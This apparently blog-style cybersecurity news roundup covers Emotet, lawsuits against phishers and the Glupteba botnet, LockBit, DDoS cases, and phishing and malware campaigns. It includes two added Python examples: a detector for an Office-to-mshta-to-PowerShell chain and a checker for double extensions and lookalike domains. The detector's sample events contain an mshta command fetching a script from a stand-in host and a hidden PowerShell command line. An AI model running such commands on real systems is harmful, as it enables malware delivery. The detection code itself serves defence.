
Emotet Malware: Shut Down Last Year, Now Showing a Strong Resurgence


The notorious Emotet malware operation is exhibiting a strong resurgence more than a year after being effectively shut down. Check Point researchers put the Windows software nasty at the top of their list as the most commonly deployed malware in a March threat index, threatening or infecting as many as 10% of organisations around the world during the month – an almost unbelievable figure, and more than double that of February. 

Now, according to Kaspersky Labs, a swiftly accelerating and sophisticated spam email campaign is intriguing targets with fraudulent emails designed to swindle them into unpacking and installing Emotet or Qbot malware, which can steal data, collect information on a compromised corporate network, and move laterally through the network to install ransomware or other trojans on networked computers. 

Qbot, which is associated with Emotet's operators, is also capable of accessing and stealing emails, Kaspersky's email threats protection group manager, Andrey Kovtun, stated in a blog post this week. In February, Kaspersky discovered 3,000 malicious Emotet-linked emails, followed by 30,000 a month later, in languages including English, French, Italian, Polish, Russian, and Spanish. 

Kovtun wrote, "Some letters that cybercriminals send to the recipients contain a malicious attachment. In other cases, it has a link which leads to a file placed in a legitimate popular cloud-hosting service. Often, malware is contained in an encrypted archive, with the password mentioned in the e-mail body." 

The spam email often claims to include essential information, such as a commercial offer, in order to persuade the recipient to open the attachment or download the harmful file via the link. "Our experts have concluded that these e-mails are being distributed as part of a coordinated campaign that aims to spread banking Trojans," he wrote further. 

Cryptolaemus, a group of security researchers and system administrators formed more than two years ago to combat Emotet, announced on Twitter this week that one of the botnet subgroups has switched from 32-bit to 64-bit loaders and stealer modules, indicating continued development by the botnet's operators. Emotet has quickly returned to the malware world's upper echelons. In February 2021, Europol, together with police from the United States, Germany, the United Kingdom, and Ukraine, completed a multinational takedown of the primary botnet deploying Emotet. Raids on the accused operators' houses in Ukraine were part of the operation. 

The raid, according to Europol, substantially impacted Emotet's operations, which were used to infiltrate thousands of firms and millions of computers around the world. However, in publishing its March threat index, Check Point Research stated that Emotet resurfaced in November 2021 and has gained traction after the Trickbot botnet infrastructure was shut down in February. It is once again the most common malware. 

The researchers wrote, "This was solidified even further [in March] as many aggressive email campaigns have been distributing the botnet, including various Easter-themed phishing scams exploiting the buzz of the festivities. These emails were sent to victims all over the world with one such example using the subject 'Buona Pasqua, happy easter,' yet attached to the email was a malicious XLS file to deliver Emotet." 

Meta Takes Legal Action Against Cyber Criminals


Facebook's parent company, Meta Platforms, announced on Monday that it has filed a federal lawsuit in the U.S. state of California against malicious attackers who ran more than 39,000 phishing websites impersonating its digital properties to trick consumers into disclosing their username and password. 

“Today, we filed a federal lawsuit in California court to disrupt phishing attacks designed to deceive people into sharing their login credentials on fake login pages for Facebook, Messenger, Instagram, and WhatsApp. Phishing is a significant threat to millions of Internet users”, states the report. 

The social engineering strategy involved building rogue websites that impersonated the Facebook, Messenger, Instagram, and WhatsApp login pages, prompting victims to enter their login details, which were then captured by the defendants. Meta is also seeking $500,000 in damages from the unidentified actors. 

The attacks were conducted with the help of Ngrok, a relay service that redirected internet traffic to the malicious websites while concealing the true location of the phishing infrastructure. Meta stated that the frequency of these phishing attacks has increased since March 2021 and that it has collaborated with the relay service to block thousands of URLs pointing to phishing sites. 

The lawsuit comes just days after Facebook revealed it was making efforts to disrupt the activities of seven surveillance-for-hire firms that generated over 1,500 phony identities on Facebook and Instagram to target 50,000 users in over 100 countries. Meta announced last month that it has barred four harmful cyber groups from attacking journalists, humanitarian organizations, and anti-regime military forces in Afghanistan and Syria. 

“This lawsuit is one more step in our ongoing efforts to protect people’s safety and privacy, send a clear message to those trying to abuse our platform, and increase accountability of those who abuse technology. We will also continue to collaborate with online hosting and service providers to identify and disrupt phishing attacks as they occur. We proactively block and report instances of abuse to the hosting and security community, domain name registrars, privacy/proxy services, and others. And Meta blocks and shares phishing URLs so other platforms can also block them”, mentioned the report.

Google Sues Two Russian Hackers

Google has filed lawsuits against two Russians - Dmitry Starovikov and Alexander Filippov. According to the company, they are behind the activities of a botnet called Glupteba.

The corporation claims that Glupteba has infected more than a million Windows devices worldwide, and that infections are growing by "thousands" daily. The botnet was used to steal Google user account data. Most often, the infection occurred after users downloaded free applications from unauthorized sources.

In addition to stealing and using other people's data, Glupteba was aimed at covert cryptocurrency mining and at redirecting other people's traffic through infected computers and routers. In this way, illicit traffic can also be routed through victims' devices.

Google notes Glupteba's technical sophistication. It uses a blockchain, whose decentralized nature lets the botnet effectively protect itself against disruption of its operations. For the company, this is the first case of fighting a blockchain-based botnet.

The main infrastructure of the botnet has now been neutralized. Those who managed the network of infected devices no longer have access to it. However, the company notes that this is true only for the moment.

Google believes that it was Starovikov and Filippov who managed Glupteba, based on data in their Gmail accounts and Google Workspace applications. The company is seeking compensation for damages from them, as well as a lifetime ban on their use of Google services.

According to experts, this could set a positive precedent. If the two Russians are actually punished significantly, it would significantly weaken the attacker community in cyberspace. At a minimum, the hackers' sense of impunity would disappear. You can read about how Google representatives tracked the hackers on the company's official website.

HHS Cybersecurity Agency Issues Threat Briefing on LockBit Ransomware


A security report on LockBit, a ransomware gang that reportedly released a new variant, has been issued by the Health Sector Cybersecurity Coordination Center (HC3). The cybercriminals were behind the widely reported cyberattack on Accenture this summer, in which the corporation was reportedly threatened with a ransom demand of $50 million. 

LockBit ransomware is a malicious program that blocks users from accessing their computers and demands a ransom. LockBit automatically scans a network for valuable targets, spreads the infection, and locks every computer it can reach. This ransomware is used in highly targeted cyberattacks against businesses and other organizations. 

LockBit was introduced in September 2019 and began advertising its "ransomware as a service" affiliate scheme in January 2020, according to HC3. 

In May 2020, it began collaborating with Maze, another ransomware organization, and in September of the same year it debuted its own leak site. LockBit v2.0 was released in June of this year. According to HC3, it employs a two-pronged extortion scheme involving the StealBit malware, has improved encryption, and bypasses User Account Control. 

"Threat actors continue to view unpatched systems as an easy, if not preferred, method of intrusion," wrote officials from the cybersecurity arm of the U.S. Department of Health and Human Services in its brief. 

It moreover relaunched its affiliate program, wherein affiliates determine the ransom, then choose a payment system, and receive the majority of the money before actually paying the organization. Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, and Uzbekistan are among the Commonwealth of Independent States countries where the program does not function. 

Based on an interview with a LockBit ransomware operator, HC3 concluded that the malicious actors appear to have a "contradictory code of ethics." 

According to HC3, healthcare facilities are ideal targets, but the LockBit affiliate showed "a strong disdain for those who attack healthcare entities while displaying conflicting evidence about whether he targets them himself." 

"The U.S. also has lucrative targets, but with data privacy laws requiring victim companies to report all breaches, the incentive for such entities to pay the ransom is likely somewhat reduced," said HC3. 

"Cybercriminals are avid consumers of security news and remain up to date on the latest research and vulnerabilities, weaponizing that information to use in future attacks," it wrote. 

Threat advisories on various ransomware organizations, including BlackMatter, Conti, and Hive, have recently been published by the federal government. The alerts, however, haven't stopped the flood of ransomware news. Hive hacked a Missouri health center earlier this month and published patient names, Social Security numbers, and medical information on its blog.

NSA’s Cyber Chief Warned About the Increasing Cyber Threat


On Wednesday, the 29th of September, the chief of the National Security Agency's cyber branch cautioned about the growing number of digital threats and the danger that state-backed and criminal cyber actors pose. 

Rob Joyce, Director of the NSA Cybersecurity Directorate, stated during the ASPEN Cyber Summit in Colorado that nearly every single government in the world today has a cyber exploitation program. 

Joyce was special assistant to the president and cybersecurity coordinator of the National Security Council in 2018, and has held many other responsibilities at the nation's leading electronic spying agency. 

“The vast majority of those are used for espionage and intelligence purposes, but… there is interest in dabbling in offensive cyber and outcomes. The difference between the top of the list and the bottom of the list, usually, is scale,” stated Joyce. 

There are some “high-end, sophisticated small actors, but they’re confined to whatever that national interest is that they’re aimed at so we see less of them.” 

Joyce also gave his assessment of the so-called "Big Four", the foreign states that have historically been America's digital adversaries, and their latest internet activity: Russia, China, Iran, and North Korea. 

Starting with Russia, he said that it is the disruptive force. Often they attempt not to lift themselves up but to pull others down. They are still extremely active in intelligence-gathering efforts targeting critical infrastructure and other countries. The problem is that they aggressively employ disruptive effects all around the world. The agency has seen indications of pre-positioning in U.S. critical infrastructure, and everyone must push back against every activity that cannot be permitted. 

Turning to China, he noted that China is off the charts in scale and scope. The number of cyber actors from China is growing all over the world. The NSA respected them less four or five years ago than it does today; its perception has changed. They have always been broad, loud, and boisterous, but what the agency finds is that, with such a vast resource base, the elite within that group is truly elite. 

“The high end of the Chinese sophistication is really good. We’ve got to continue to understand, disrupt and then find ways across the whole of that technology to kind of push back… Yes, defense is really important, but you also have to work to disrupt so that’s the continuous engagement strategy out of the [Defense Department] and the idea that we got to put sand and friction in their operations, so they don’t get just free shots on goal,” he added. 

Later, speaking about Iran, he said that Iran is still active in cyber operations. They were certainly the first nation everyone talked about during the bank distributed denial-of-service operations and the Shamoon wiper malware. However, what the NSA currently observes is that they concentrate very much on regional matters; their focus has not been as broad in its impact. But they are capable, especially because their decision-making is less restrained and, most crucially, because the threat is a realistic one. Iran sometimes does not appreciate how far it has gone in arousing the anger and concern of the larger community. 

Lastly, he said that North Korea remains extremely focused on generating income for the regime, since further sanctions have little effect on North Korea. They therefore had to develop ways to generate cash and trade, and realized that it is simpler to steal Bitcoin than to steal from Bangladesh Bank. They have not attacked the largest banks as hard, since they made the money they needed in the crypto realm. 

“The commercial firms were dealing with a lot of North Korean issues back when the [Covid-19] vaccine was an issue; they were going after the intellectual property of vaccine makers. So, still active, still a threat, very capable but mostly focused on crypto exchanges and creating money,” he added. 

Russian Electronic Voting System Struck by 19 DDoS Attacks in One Day


Yandex, the Russian technology and search engine powerhouse, disclosed last week that it had been hit by one of the world's biggest DDoS attacks ever recorded. 

A distributed denial-of-service (DDoS) attack involves flooding a website or service with a large amount of internet traffic until it stops working and eventually goes down. Cybercriminals have been known to create botnets and launch DDoS attacks using hacked systems or vulnerable/exposed Internet of Things (IoT) devices. 

Russia's remote electronic voting system has now become the next victim, in what appears to be a continuation of the targeted DDoS campaign. 

According to reports, the 8th Russian State Duma (lower house) elections took place between September 17 and September 19. Voters had to head to the polls to cast their vote for the heads of nine Russian regions and 39 regional parliaments. 

According to Russian news agency Tass, remote electronic voting took place in six locations, including Sevastopol and the regions of Kursk, Murmansk, Nizhny Novgorod, Rostov, and Yaroslavl. 

Around 19 DDoS attempts were thwarted, according to Mikhail Oseevsky, president of Rostelecom. The head of the country's major digital service provider, Rostelecom, told the reporters at the Central Election Commission's information centre that some of the DDoS assaults were very short, spanning only a few minutes, while the biggest lasted 5 hours and 32 minutes. 

“It (the DDoS attack) began early in the morning and ended in the middle of the day,” Oseevsky disclosed. 

Many of the country's digital resources, including the elections, state services websites, and the CEC's portal, were attacked, according to Oseevsky. 

He continued by stating that there had been several attempts to launch large-scale attacks on these resources. Rostelecom, however, was well prepared to combat and minimise the threat, according to its president. 

The assaults arose from a number of different countries which include: 
  • India 
  • China 
  • Brazil 
  • Russia 
  • Germany 
  • Thailand 
  • Lithuania 
  • Bangladesh 
  • United States 

According to the elections commission, three targeted cyberattacks were documented from abroad, two of which targeted the centre's main website, while the third was a DDoS attack.

35 Years of Imprisonment for the Administrator of 200,000 DDoS Attacks


After a 9-day trial, a California jury found the administrator of two distributed denial of service (DDoS) operations guilty. Matthew Gatrel, a 32-year-old man from Saint Charles, Illinois, operated two websites that allowed paying users to launch over 200,000 DDoS attacks against private and public targets. 

Court filings disclose that Gatrel has operated DDoS services since October 2014 through two sites, DownThem and AmpNode. He used DownThem to sell subscriptions to DDoS services (sometimes referred to as "booters" or "stressers"), while AmpNode supplied clients who wanted pre-configured servers with DDoS attack programs and lists of vulnerable systems that could amplify the attacks. 

Investigators found more than 2,000 registered clients in the databases of the DownThem booter portal. According to the documents, those users launched more than 200,000 DDoS attacks. The targets included households, schools, universities, websites of municipal and local authorities, and financial organizations throughout the world. 

“Often called a “booting” service, DownThem itself relied upon powerful servers associated with Gatrel’s AmpNode bulletproof hosting service. Many AmpNode customers were themselves operating for-profit DDoS services,” stated the U.S. Department of Justice.

Clients could choose from several subscriptions, each offering different attack capabilities such as duration, intensity, or the number of concurrent attacks. 

If the victim was reachable, the service would launch "reflected amplification attacks" from AmpNode attack servers, employing "hundreds or thousands of other servers connected to the Internet." 

Gatrel was not alone in this operation. In 2018, Juan Martinez of Pasadena helped him operate the DownThem website. 

Gatrel faces a statutory maximum of 35 years in federal prison at his sentencing, scheduled for January 27, 2022, for the three crimes of which he was found guilty: 

  • one count of conspiracy to commit unauthorized impairment of a protected computer.
  • one count of conspiracy to commit wire fraud.
  • one count of unauthorized impairment of a protected computer.

Juan Martinez, unlike Gatrel, has already pleaded guilty; at his sentencing hearing on 2 December he faces a statutory maximum term of imprisonment of 10 years.

43% of all Malware Installations are Concealed in Microsoft Office Documents


With the transition from office work to remote work, companies now rely on hundreds of cloud applications, many of which may be vulnerable to cyberattacks or exploitation. This has widened the attack surface and exposed them to a slew of new threats. 

Although hiding malware in office documents has been around for a long time, it is still very effective at duping individuals. After embedding a hostile macro in an office document, malicious actors send the infected file to thousands of people via email and wait for potential targets to open it. A macro is a collection of commands packaged together to perform a task automatically. 

According to recent research by the Atlas VPN team, malicious office documents account for 43 percent of all malware installations. Dangerous office files are popular among cybercriminals because they can evade suspicion by most antivirus programs. 

The research is based on the Netskope Threat Lab Cloud and Threat Report: July 2021 Edition. It examined office documents from all platforms, including Microsoft Office 365, Google Docs, PDFs, and others. A year earlier, in the second quarter of 2020, only 14 percent of all downloaded malware consisted of malicious office documents. In the third quarter of last year, the percentage rose to 38%. This growth was driven mostly by remote work, as attackers discovered that malware-infected documents proved effective. 

The effectiveness of EMOTET appears to have spread swiftly among cybercriminal gangs, motivating other hackers to adopt a similar approach. Another reason harmful documents succeed is that they can avoid detection by antivirus software and appear to be from a reliable source. 

Malware-infected document cyberattacks are designed to exploit the user's inability to recognize the danger. Only a blend of cybersecurity knowledge, training, and security software can provide the highest level of protection.

Fraudsters have taken advantage of Microsoft Office and Google Docs' popularity by introducing malicious code into the documents. To protect users from malware attacks, organizations must design and maintain a cybersecurity plan that addresses both the technological and human components. 

Driver's License Exploitation Scams Surge


The Covid epidemic has provided a ripe opportunity for cybercriminals, who are exploiting the expired driver's licenses of targeted individuals. 

According to Stateline, the "phishing" scams benefit from the fact that several states issued emergency declarations permitting driver's licenses to remain valid beyond their expiry dates. As those extensions expire, drivers must now make sure their licenses are renewed, and scammers are taking full advantage of that shift, according to Stateline. 

In conventional phishing, cybercriminals send malicious links or attachments via email, and victims inadvertently click on them. Fraudsters also use text messaging to conduct their operations, which is known as "SMS phishing" or "smishing." 

According to state motor vehicle agencies, driver's license phishing scams, which attempt to steal identities and personal information, have been sprouting up across the United States. Iowa, Minnesota, Ohio, Vermont, and Wyoming are among the states in which the scams have been detected so far. 

Scam artists send out SMS messages or emails falsely claiming that the target's license needs an urgent update because some information is missing, or even that it is about to expire and will be invalid within a few days. When a person clicks the link, a Google Form requesting personally identifiable information such as a Social Security number and date of birth often opens. 

“It’s despicable,” said David Druker, a spokesperson for the Illinois secretary of state’s office, which issues driver’s licenses. “It’s just outrageous that when the country is going through the COVID crisis, people are taking the time and energy to steal information from others.” 

A large number of people in Illinois, according to Druker, reportedly received texts and emails from fraudsters posing as the secretary of state or as employees of the state transportation department. Druker added that he did not know whether anyone had fallen for the ruses. 

Upon learning of the phishing and smishing, Illinois officials notified the FBI and IRS, who collaborated with Google to remove the bogus webpages. According to Druker, the authorities have discovered 1,035 sites so far, and Google has taken down nearly 900 of them. 

As per a notice issued earlier this month by the U.S. Department of Health and Human Services' Office of Inspector General, fraudsters are now employing door-to-door visits, along with telemarketing calls, messages, and social networking sites, to conduct COVID-19-related frauds. 

“Do not provide personal, medical, or financial details to anyone in exchange for vaccine information, and obtain vaccinations from trusted providers,” the Office of Inspector General urges. 

“Posting content that includes your date of birth, health care details, or other personally identifiable information can be used to steal your identity,” said the Inspector General’s office.

Threat Group Aggah Targets Industries Via Spear-Phishing Campaigns


A spear-phishing attack that seems to have commenced in early July 2021, targeting various manufacturing industries in Asia has been identified and reported by Anomali Threat Research. 

The tactics, techniques, and procedures (TTPs) detailed in the report match those of the threat group Aggah. The investigation uncovered several PowerPoint files with malicious macros that used MSHTA to launch a PowerShell script that loads hex-encoded payloads. Based on these findings and the analysis of the campaign's TTPs, researchers assessed that the threat group behind the incident is probably Aggah. 

Cybercriminals used numerous compromised WordPress websites to target Asian manufacturers in a new phishing operation that delivers Warzone RAT, a commodity sold on crime forums, researchers stated. 

Warzone is a commodity malware with cracked versions available on GitHub. The RAT reuses code from the Ave Maria stealer. According to the researchers, Warzone RAT's features include privilege escalation, keylogging, a remote shell, file download and execution, a file manager, and persistence on the compromised host.

Based on recent research by the security firm Anomali, the threat group Aggah, which is believed to be associated with Pakistan and was first identified in March 2019, has delivered the RAT to manufacturing enterprises in Taiwan and South Korea. 

Aggah is an information-stealing threat group first discovered by researchers from Palo Alto Networks' Unit 42. The researchers initially believed the activity to be a campaign against organizations in the UAE. In-depth research by the same team revealed that it was a global RevengeRAT phishing campaign.

“Spoofed business-to-business (B2B) email addresses against the targeted industry is activity consistent with Aggah,” Tara Gould and Rory Gould from Anomali Threat Research wrote in a report on the campaign published Thursday 12th of August 2021. 

Aggah, which normally seeks to steal information from its targets, was also previously thought to be affiliated with the Gorgon Group, a Pakistani organization known for targeting Western governments. This relationship has not been confirmed, but the Anomali researchers believe that the Urdu-speaking group operates from Pakistan. Aggah's most recent campaign targeted the Taiwan-based manufacturing company Fon-star International Technology, the Taiwanese engineering company Fomo Tech, and the Korean power plant Hyundai Electric. 

Researchers have indicated that the latest campaign of Aggah for spear phishing began with a bespoke e-mail pretending to be from "FoodHub.co.uk," a UK-based food delivery service. “The email body includes order and shipping information as well as an attached PowerPoint file named 'Purchase order 4500061977, pdf.ppam' that contains obfuscated macros that use mshta.exe to execute JavaScript from a known compromised website, mail.hoteloscar.in/images/5[.]html,” researchers stated. 

“Hoteloscar.in is the legitimate website for a hotel in India that has been compromised to host malicious scripts,” they said. “Throughout this campaign, we observed legitimate websites being used to host the malicious scripts, most of which appeared to be WordPress sites, indicating the group may have exploited a WordPress vulnerability.”
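As an added, defender-side illustration that is not part of the Anomali report or the original post, the following Python sketch shows how the execution chain described above (a PowerPoint add-in macro, then mshta.exe fetching a remote script, then PowerShell handling a hex-encoded payload) can be spotted in process-creation telemetry. The events, process IDs, paths and hostnames are constructed for the example; the Sysmon-like field names, the 40-character hex-blob threshold and the process lists are assumptions.

```python
"""
Detection logic for an Office -> mshta.exe -> PowerShell execution chain
of the kind attributed to Aggah on this page. Runs over a small set of
constructed process-creation events shaped like Sysmon Event ID 1
(ParentImage, Image, CommandLine). Nothing here is real telemetry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumed lists: Office hosts, script-host LOLBins, and shells.
OFFICE_APPS = {"powerpnt.exe", "winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Heuristic (assumed threshold): a run of 40+ hex characters in a command
# line is treated as an embedded hex-encoded payload.
HEX_BLOB = re.compile(r"(?<![0-9A-Fa-f])[0-9A-Fa-f]{40,}(?![0-9A-Fa-f])")
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the new process
    cmdline: str
    parent_image: str  # full path of the parent process


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the detection labels that fire for one event (empty if benign)."""
    hits: list[str] = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if parent in OFFICE_APPS and img in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if img == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        hits.append("mshta_remote_script")
    if parent in SCRIPT_HOSTS and img in SHELLS:
        hits.append("script_host_spawned_shell")
    if img in SHELLS and HEX_BLOB.search(ev.cmdline):
        hits.append("shell_with_hex_payload")
    return hits


def detect_chain(events: list[ProcEvent]) -> list[dict]:
    """Correlate events by pid/ppid and report each Office-rooted chain.

    A finding is emitted for every script host spawned by an Office app;
    its children are folded in so the analyst sees the whole chain and the
    union of labels, which doubles as a crude severity score.
    """
    findings = []
    for ev in events:
        labels = classify(ev)
        if "office_spawned_script_host" not in labels:
            continue
        chain = [basename(ev.parent_image), basename(ev.image)]
        chain_labels = set(labels)
        for child in (c for c in events if c.ppid == ev.pid):
            child_labels = classify(child)
            if child_labels:
                chain.append(basename(child.image))
                chain_labels.update(child_labels)
        findings.append({"root_pid": ev.pid, "chain": chain,
                         "labels": sorted(chain_labels),
                         "score": len(chain_labels)})
    return findings


# Constructed sample events (paths, PIDs and hosts are placeholders).
EXPLORER = r"C:\Windows\explorer.exe"
POWERPNT = r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"
MSHTA = r"C:\Windows\System32\mshta.exe"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
HEX_PAYLOAD = "deadbeef" * 8  # constructed 64-char hex string, not a real payload

SAMPLE_EVENTS = [
    # benign: user opens a normal deck, nothing is spawned
    ProcEvent(100, 1, POWERPNT, 'POWERPNT.EXE "C:\\Users\\a\\quarterly.pptx"', EXPLORER),
    # benign: admin runs a local HTA from a command prompt
    ProcEvent(200, 50, MSHTA, "mshta.exe C:\\tools\\inventory.hta", CMD),
    # suspicious chain modelled on the description above
    ProcEvent(300, 1, POWERPNT,
              'POWERPNT.EXE "C:\\Users\\a\\Downloads\\Purchase order, pdf.ppam"', EXPLORER),
    ProcEvent(301, 300, MSHTA, "mshta.exe http://compromised-site.example/images/page.html", POWERPNT),
    ProcEvent(302, 301, PWSH, f"powershell.exe -nop -w hidden -c $h='{HEX_PAYLOAD}'", MSHTA),
]

if __name__ == "__main__":
    for finding in detect_chain(SAMPLE_EVENTS):
        print(finding)
```

The benign events yield no labels, while the constructed chain is reported once, rooted at the mshta.exe process, with all four labels attached.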

Russia-Based Company DDoS-Guard Gets Targeted by Cybercriminals


Leaked data for sale on cybercrime forums and marketplaces appears so frequently that it is essentially unremarkable, except for the choice of a particular victim. However, such leaks can reveal that a site or service has been compromised, possibly without its operators being any the wiser. 

One such prospective victim is the Russian company DDoS-Guard, which protects against distributed denial-of-service attacks. The company's supposed client data was put up for sale on a cybercrime forum. 

DDoS-Guard is a Russian Internet infrastructure company that offers DDoS protection, content delivery network services, and web hosting. 

On 26 May, a user on Exploit.in put "the full dump on the popular online DDoS-Guard service" up for auction, with an opening price of $500,000 and a "buy it now" blitz price of $1.5 million. Later, however, the auction was restarted at $350,000. 

Singapore-based cybersecurity firm Group-IB reports that beyond DDoS defenses, "DDoS-Guard also provides computing capacities and obstructs the identification of website owners of hundreds of shady resources that are engaged in illicit goods sale, gambling and copyright infringements." 

"We've seen several rogue websites hosted by DDoS-Guard," says Reza Rafati, a senior analyst at Group-IB's CERT-GIB incident response unit in Amsterdam. "They were almost impossible to take down. Their answer to our numerous complaints on them protecting illegal resources is that they are not the owners of these websites. Such a safe environment for illicit online activity doesn't do any good for the global effort against cybercrime." 

According to the Exploit.in listing, the DDoS-Guard customer database contains "all info such as name, site, real IP, payment info, etc." The seller claimed that several well-known websites, including RuTracker.org, a Russian BitTorrent tracker, are on the client list. The listing says that the DDoS-Guard "infrastructure, backend, front end, and network filtering/blocking" are all included in the sale. 

A DDoS-Guard spokesperson nevertheless rejected the seller's claims on Exploit.in. "We are aware that malefactors are trying to sell a certain database. Our company has not experienced any data leaks," Ruvim Shamilov, DDoS-Guard's PR manager, stated. 

The domain and IP address service SecurityTrails attributes to DDoS-Guard sites belonging to Hamas, the Palestinian militant party that rules Gaza, as well as a large number of sites with suspicious names that are potentially used by fraudsters, such as "bitdefender-centrals.com," "nortoncomsetupz.com" and "garmin-express.support." 

For DDoS-Guard users, it may soon be possible to identify anyone who has been operating sites on the service, depending on who gets hold of the client database dump. Law enforcement agencies are probably already aware, says cybersecurity expert Alan Woodward. 

"Anything that is done at scale, and particularly where it is crime as a service, is bound to attract the attention of the police," says Woodward. In addition to finding ways to interrupt services connected with illegal activity, law enforcement organizations have shown themselves to follow users of the service.

Threat Actors Use Marvel's Black Widow Movie To Spread Malware


Marvel's Black Widow film has finally been released in theatres and online streaming platforms after being delayed for over a year due to the COVID-19 epidemic. Unfortunately, Marvel Universe fans aren't the only ones who are enthusiastic, as the launch of the Black Widow film has sparked the interest of several fraudsters and hackers. 

According to research conducted by cybersecurity firm Kaspersky, threat actors have been unlawfully monetizing interest in the upcoming film for months. 

Kaspersky warns of Black Widow movie-themed malware: the film was released on July 9th in the United Kingdom but has yet to be released in many other countries. Researchers have discovered malware downloads posing as the new Black Widow film already spreading on the internet. 

Several Black Widow-themed phishing sites are running, according to the company, aimed at harvesting user credentials. One of the websites examined by researchers promised viewers an early screening of the film in exchange for registering on the site. Users were asked to provide their bank card details during registration, supposedly to confirm their region of residence. Later they discovered that money had been deducted from their account while they still had no access to the movie. 

According to Kaspersky experts, there has been an increase in attempts to infect users who are keenly awaiting the new film's release. They first saw the rise in infection attempts following the film's formal announcement in May 2020, then again around its original November 2020 release date, and finally in May 2021. 

Since the movie's release date was pushed back to July 2021, hackers have tried to take advantage of the confusion, infecting 13 percent of streaming services and even circulating supposed downloadable files of the movie. 

Kaspersky security expert Anton V. Ivanov wrote, “Right now, we have observed intensified scamming activities around Black Widow, the release of which, fans all over the world have been eagerly anticipating for a long time. In their excitement to watch the long-awaited movie, viewers have become inattentive to the sources they use, and this is exactly what fraudsters benefit from.” 

Precautionary Measures: 

Scammers are not only using phishing websites to deceive users; they are also distributing executable files disguised as movie downloads. To stay safe, avoid files with a .EXE or .MSI extension, because movie files generally have .MP4, .AVI, .MOV, .WMV, or .M4P extensions. 

Furthermore, pay special attention to the website URL you visit in order to see or download the film. Scammers frequently make minor modifications to the domain or movie name, so double-check the address to rule out any bad activity. 

Finally, use anti-malware software that has a phishing site detection capability.
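As an added illustration of the two checks above (it is not code from the original post or from Kaspersky), the following Python helper flags a download whose real, final extension is executable even when a video extension has been wedged in front of it, and compares a URL's registrable domain against a list of domains the reader trusts. The trusted domain "example-stream.com" and the sample file names are constructed for the example; the domain splitting assumes a two-label suffix such as ".com" and does not consult the public suffix list.

```python
import os
from urllib.parse import urlsplit

# Extensions the post warns about (real executables) and the ones a movie
# file would normally carry.
RISKY_EXTENSIONS = {".exe", ".msi"}
VIDEO_EXTENSIONS = {".mp4", ".avi", ".mov", ".wmv", ".m4p"}


def split_all_extensions(filename):
    """Return every extension of a file name, outermost last.
    'Black Widow.mp4.exe' -> ['.mp4', '.exe']"""
    exts = []
    base = os.path.basename(filename)
    while True:
        base, ext = os.path.splitext(base)
        if not ext:
            return exts
        exts.insert(0, ext.lower())


def is_risky_download(filename):
    """True when the file's real (last) extension is executable, even if a
    video extension was placed in front of it as a disguise."""
    exts = split_all_extensions(filename)
    return bool(exts) and exts[-1] in RISKY_EXTENSIONS


def is_expected_video(filename):
    """True when the file ends in one of the usual movie extensions."""
    exts = split_all_extensions(filename)
    return bool(exts) and exts[-1] in VIDEO_EXTENSIONS


def edit_distance(a, b):
    """Levenshtein distance, used to catch one- or two-character domain tweaks."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(url):
    """Last two labels of the host name (urlsplit lower-cases it).
    Assumption: a two-label suffix such as '.com'; a public suffix list
    would be needed to handle '.co.uk' correctly."""
    host = (urlsplit(url).hostname or "").rstrip(".")
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def classify_url(url, trusted_domains):
    """'trusted' for an exact match, 'lookalike' when the domain is within two
    edits of a trusted domain or embeds its brand label, otherwise 'unknown'."""
    domain = registrable_domain(url)
    if domain in trusted_domains:
        return "trusted"
    for trusted in trusted_domains:
        brand = trusted.split(".")[0]
        if edit_distance(domain, trusted) <= 2 or brand in domain:
            return "lookalike"
    return "unknown"


if __name__ == "__main__":
    trusted = {"example-stream.com"}  # constructed trusted domain
    for url in ("https://www.example-stream.com/watch",
                "https://exampIe-stream.com/watch",          # capital I for l
                "http://example-stream-free.net/Black.Widow.mp4.exe"):
        print(url, "->", classify_url(url, trusted))
    for name in ("Black Widow (2021).mp4.exe", "Black Widow.mp4", "setup.MSI"):
        print(name, "->", "risky" if is_risky_download(name) else "ok")
```

The double-extension case is the one to remember: Windows hides known extensions by default, so "Black Widow.mp4.exe" is shown as "Black Widow.mp4" in Explorer, which is why the check looks at the last extension rather than the first one it finds.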

Social Media Influencers are the Latest Target of Cyber Criminals


The number of cybercrimes and scams is rising rapidly with the advancement of technology. Police say that a new form of cyber fraud involving social media influencers has been detected. 

Social media influencers have a great number of followers, and companies pay them regularly to promote products on their handles. Many famous people get roped in, too. 

Cyber fraud is a kind of cybercrime that uses the Internet to conceal information or to present false data in order to cheat victims out of money, property, or inheritance. 

Cyber law expert N. Karthikeyan notes that mainstream media cannot carry advertisements for gambling or bogus investments. Such fake operators can instead use social media influencers who are unaware of the consequences. Some influencers on social media promote nothing but fictitious mobile apps. Fraudsters also send dubious links to influencers while posing as their supporters. Once the victims click the link and enter their details, the fraudsters acquire complete control of the influencer's page or channel. They then post their own content, which can be anything.

However, the Cyber Crime Cell officials noted that no specific complaint had yet been made on the matter. 

A woman social media influencer who was a candidate in recent elections said, "After uploading my affidavit onto the ECI website, I had three lakh downloads. I got good reviews on a social media page but only one person alleged that I had hacked the ECI site, which was baseless. He went on leveling allegations on me. I just ignored it." 

